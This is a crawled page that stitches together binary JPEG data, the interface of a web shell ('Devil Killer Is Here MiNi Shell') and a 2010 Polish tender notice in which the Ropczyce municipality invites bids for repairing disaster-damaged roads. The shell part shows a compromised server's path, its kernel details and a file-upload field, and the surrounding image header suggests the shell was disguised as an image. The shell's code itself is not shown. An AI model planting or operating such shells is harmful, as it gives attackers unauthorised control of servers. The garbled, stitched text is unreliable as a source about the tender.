JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100419/110346-N-2010.html

<p class="kh_header"><b>Ropczyce: Wykonanie odbudowy infrastruktury drogowej w ramach otrzymanych środków finansowych na usuwanie skutków klęsk żywiołowych, gdzie zastosowano podział zadań.CPV 45-23-31-42-6, 45-23-32-22-1</b><br>
<b>Numer ogłoszenia: 110346 - 2010; data zamieszczenia: 19.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ropczyce , ul. Krisego 1/30, 39-100 Ropczyce, woj. podkarpackie, tel. (017) 2210550, faks (017) 2210555.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.ropczyce.umig.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.ropczyce.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie odbudowy infrastruktury drogowej w ramach otrzymanych środków finansowych na usuwanie skutków klęsk żywiołowych, gdzie zastosowano podział zadań.CPV 45-23-31-42-6, 45-23-32-22-1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane wykonywane na istniejących odcinakach dróg gminnych i ulic na łącznej długości 6540 mb oraz chodniku na długości 340 mb polegające na przywróceniu ich do wymaganego stanu technicznego. 
Szczegółowy zakres robót określaja przedmiary robót dla poszczególnych zadań..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.32.22-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu dotyczącego posiadania wiedzy  i doświadczenia nastąpi poprzez sprawdzenie czy w dołączonych do oferty wymaganych oświadczeniach i dokumentach wykonawca wykazał, że wykonał co najmniej jedną robotę budowlaną o charakterze i zakresie zbliżonym do przetargowego.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu dotyczącego dysponowania odpowiednim potencjałem technicznym nastąpi poprzez sprawdzenie czy wykonawca potwierdził spełnianie tego warunku składając odpowiednie oświadczenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu dotyczącego dysponowania  osobami zdolnymi do wykonania zamówienia nastąpi poprzez sprawdzenie, czy w dołączonych do oferty oświadczeniach i dokumentach wykonawca wykazał, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają uprawnienia do kierowania robotami budowlanymi w zakresie: branży drogowej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu dotyczącym sytuacji ekonomicznej        i finansowej nastąpi poprzez sprawdzenie czy wykonawca potwierdził spełnianie tego warunku składając odpowiednie oświadczenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Operat kolaudacyjny zawierający badania kruszyw, receptury, atesty.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istotne dla stron postanowienia umowy określa załączony projekt umowy. 
2.  Zamawiający    przewiduje    możliwość    wprowadzenia    w    przyszłej    umowie
następujących zmian w stosunku do treści oferty:
1) skrócenie lub wydłużenie terminu wykonania umowy,
2) zmiana przez Zamawiającego Zakresu robót, z wyłączeniem zmniejszenia ilości robót w stosunku do przedmiaru, która to zmiana nie wymaga zmiany umowy;
3) zmiany w kolejności i terminach wykonywania robót budowlanych,
4) poprawa jakości   lub  innych   parametrów  charakterystycznych   dla danego elementu robót    budowlanych lub zmiana technologii wykonywania robót,
5)  wprowadzenie robót zamiennych,
6) zmiana Kierownika budowy,
7) zmiana Inspektora/Inspektorów nadzoru,
8) zmiany podwykonawców,
9) podniesienie bezpieczeństwa prowadzonych robót.
3.Wniosek  o zmianę umowy  winien zawierać:
1) opis zmiany
2)  uzasadnienie zmiany
3)  koszt zmiany oraz wpływ na wysokość wynagrodzenia
4)  czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy
4.  Wszystkie  zmiany  wymagają zgody  Zamawiającego   i  Wykonawcy  w formie
sporządzonego i podpisanego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ropczyce.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ropczycach ul. Krisego 1, 39-100 Ropczyce, Referat Gospodarki Komunalnej i Mieszkaniowej pok. nr 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2010 godzina 11:45, miejsce: Urząd Miejski w Ropczycach ul. Krisego 1, 39-100 Ropczyce, Sekretariat pok. nr 208.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1
Remont drogi gminnej Mała - Brzeziny na długości 900 mb
w km od  0+100  do 1+ 000 CPV 45-23-31-42-6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:
1.Mechaniczne oczyszczenie istniejącej nawierzchni bitumicznej - 2350 m2
2.Wyrównanie istniejącej podbudowy ( wzmocnienie) tłuczniem kamiennym wraz zaklinowaniem klińcem,  w-wa po zagęszczeniu grub. 10 cm - 1800 m2
3.Powierzchniowe utrwalenie nawierzchni drogowych emulsją asfaltową i grysem kamiennym o wymiarach 8-12 mm w ilości 13 dm3/m2 - 1800 m2
4.Powierzchniowe utrwalenie nawierzchni drogowych emulsją asfaltową i grysem kamiennym o wymiarach 5-8 mm w ilości 8 dm3/m2 - 1800 m2
5.Mechaniczne wyrównanie istniejącej nawierzchni mieszanką mineralno - bitumiczną w ilości 75 kg/m2 - 2350 m2
6.Mechaniczne wykonanie nawierzchni ścieralnej   z masy mineralno-bitumicznej, 
standard II, grubość warstwy po zagęszczeniu  5 cm - 2350 m2
7.Ręczne formowanie                                i zagęszczanie nasypów       z ziemi dostarczanej samochodami samowyładowczymi grunt kat. III-IV ( uzupełnienie poboczy ) - 135 m3
8.Mechaniczne oczyszczanie koparką podsiębierną o poj. łyżki do 0,4 m3 w gr. kat. IV z odwozem urobku samoch. samowył. na odległość do 1 km, rowów z namułu przy grubości do 30 cm z wyprofilowaniem dna            i skarp rowu - 800 mb.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2
Remont drogi gminnej Mała - Miklosówka na długości 830 mb
w km od  1+000  do 1+ 830 CPV 45-23-31-42-6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:
1.Mechaniczne oczyszczenie istniejącej nawierzchni bitumicznej - 3190 m2
2.Wyrównanie istniejącej podbudowy ( wzmocnienie) tłuczniem kamiennym wraz zaklinowaniem klińcem,  w-wa po zagęszczeniu grub. 10 cm - 504 m2
3.Mechaniczne wyrównanie istniejącej nawierzchni mieszanką mineralno - bitumiczną w ilości 75 kg/m2 - 3190 m2
4.Mechaniczne wykonanie nawierzchni ścieralnej        z masy mineralno-bitumicznej, 
standard II, grubość warstwy po zagęszczeniu  5cm - 3190 m2
5.Ręczne formowanie                                i zagęszczanie nasypów       z ziemi dostarczanej samochodami samowyładowczymi grunt kat. III-IV ( uzupełnienie poboczy ) - 96 m3
6.Mechaniczne oczyszczanie koparką podsiębierną o poj. łyżki do 0,4 m3 w gr. kat. IV z odwozem urobku samoch. samowył. na odległość do 1 km, rowów z namułu przy grubości do 30 cm z wyprofilowaniem dna            i skarp rowu - 1000 mb.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3
Remont drogi gminnej Łączki Kucharskie - Stobierna na  długości 700  mb w km                   od 0+000 do 0+700 CPV 45-23-31-42-6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:
1.Mechaniczne oczyszczenie istniejącej nawierzchni bitumicznej - 2554 m2
2.Mechaniczne wyrównanie istniejącej nawierzchni mieszanką mineralno - bitumiczną w ilości 75 kg/m2 - 2554 m2
3.Mechaniczne wykonanie nawierzchni ścieralnej        z masy mineralno-bitumicznej, standard II, grubość warstwy po zagęszczeniu  5cm - 2554 m2
4.Ręczne formowanie                                i zagęszczanie nasypów       z ziemi dostarczanej samochodami samowyładowczymi grunt kat. III-IV ( uzupełnienie poboczy  - 70 m3
5.Mechaniczne oczyszczanie koparką podsiębierną o poj. łyżki do 0,4 m3 w gr. kat. IV z odwozem urobku samoch. samowył. na odległość do 1 km, rowów z namułu przy grubości do 30 cm z wyprofilowaniem dna            i skarp rowu - 1200 mb.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr 4
Remont drogi gminnej  Łączki Kucharskie - Boczna Bokocia na  długości 600 mb w km od 0+800 do 1+400 CPV 45-23-31-42-6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zakres robót obejmuje:
1.Profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni, wykonane przy użyciu równiarki samojezdnej - 2 godz
2.Górna warstwa podbudowy z kruszywa łamanego klinowanego klińcem, grubość warstwy po zagęszczeniu 15 cm - 1880 m2
3.Mechaniczne wyrównanie istniejącej nawierzchni mieszanką mineralno - bitumiczną w ilości           75 kg/m2 - 1880 m2
4.Mechaniczne wykonanie nawierzchni ścieralnej        z masy mineralno - bitumicznej, standard II, grubość warstwy po zagęszczeniu  5cm - 1880 m2
5.Ręczne formowanie                                i zagęszczanie nasypów       z ziemi dostarczanej samochodami samowyładowczymi grunt kat. III-IV ( uzupełnienie poboczy ) - 158 m3
6.Mechaniczne oczyszczanie koparką podsiębierną o poj. łyżki do 0,4 m3 w gr. kat. IV z odwozem urobku samoch. samowył. na odległość do 1 km, rowów z namułu przy grubości do 30 cm z wyprofilowaniem dna            i skarp rowu - 600 mb.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie Nr 5
Remont drogi gminnej  Niedźwiada - Wronówka na  długości 300 mb w km od 0+000              do 0+300 CPV 45-23-31-42-6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:
1.Profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni, wykonane przy użyciu równiarki samojezdnej - 1 godz
2.Górna warstwa podbudowy z kruszywa łamanego klinowanego klińcem, grubość warstwy po zagęszczeniu 15 cm - 945 m2
3.Mechaniczne wyrównanie istniejącej nawierzchni mieszanką mineralno - bitumiczną w ilości           50 kg/m2 - 945 m2
4.Mechaniczne wykonanie nawierzchni ścieralnej        z masy mineralno - bitumicznej, standard II, grubość warstwy po zagęszczeniu  5cm - 945 m2
5.Ręczne formowanie                                i zagęszczanie nasypów       z ziemi dostarczanej samochodami samowyładowczymi grunt kat. III-IV ( uzupełnienie poboczy )- 40 m3
6.Mechaniczne oczyszczanie koparką podsiębierną o poj. łyżki do 0,4 m3 w gr. kat. IV z odwozem urobku samoch. samowył. na odległość do 1 km, rowów z namułu przy grubości do 30 cm z wyprofilowaniem dna            i skarp rowu - 300 mb.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie Nr 6
Remont drogi gminnej  Niedźwiada - Stawki na  długości 500 mb w km od 0+000                    do 0+500 CPV 45-23-31-42-6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:
1.Profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni, wykonane przy użyciu równiarki samojezdnej - 2 godz
2.Górna warstwa podbudowy z kruszywa łamanego klinowanego klińcem, grubość warstwy po zagęszczeniu 15 cm - 1550 m2
3.Mechaniczne wyrównanie istniejącej nawierzchni mieszanką mineralno - bitumiczną w ilości           50 kg/m2 - 1550 m2
4. Mechaniczne wykonanie nawierzchni ścieralnej        z masy mineralno - bitumicznej, standard II, grubość warstwy po zagęszczeniu  5cm -1550 m3
5.Ręczne formowanie                                i zagęszczanie nasypów       z ziemi dostarczanej samochodami samowyładowczymi grunt kat. III-IV ( uzupełnienie poboczy ) - 66 m3
6.Mechaniczne oczyszczanie koparką podsiębierną o poj. łyżki do 0,4 m3 w gr. kat. IV z odwozem urobku samoch. samowył. na odległość do 1 km, rowów z namułu przy grubości do 30 cm z wyprofilowaniem dna            i skarp rowu - 500 mb.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie Nr 7
Remont drogi gminnej  Niedźwiada - Rzeki na  długości 800 mb w km od 0+600                     do 1+400 CPV 45-23-31-42-6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:
1.Mechaniczne rozebranie nawierzchni bitumicznej gr. 5 cm z odwozem urobku  na odl. Do 1 km - 750 m2
2.Mechaniczne rozebranie nawierzchni z kruszywa naturalnego w-wa gr. 20 cm z odwozem samochod. na odl. do 1 km - 480 m2
3.Profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni, wykonane przy użyciu równiarki samojezdnej - 2 godz
4.Górna warstwa podbudowy z kruszywa łamanego klinowanego klińcem, grubość warstwy po zagęszczeniu 20 cm - 480 m2
5.Mechaniczne wyrównanie istniejącej nawierzchni mieszanką mineralno - bitumiczną w ilości           75 kg/m2 - 2400 m2
6.Mechaniczne wykonanie nawierzchni ścieralnej        z masy mineralno - bitumicznej, standard II, grubość warstwy po zagęszczeniu  5cm - 2400 m2
7.Ręczne formowanie                                i zagęszczanie nasypów       z ziemi dostarczanej samochodami samowyładowczymi grunt kat. III-IV ( uzupełnienie poboczy ) - 72 m3
8.Mechaniczne oczyszczanie koparką podsiębierną o poj. łyżki do 0,4 m3 w gr. kat. IV z odwozem urobku samoch. samowył. na odległość do 1 km, rowów z namułu przy grubości do 30 cm z wyprofilowaniem dna            i skarp rowu - 1000 mb.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
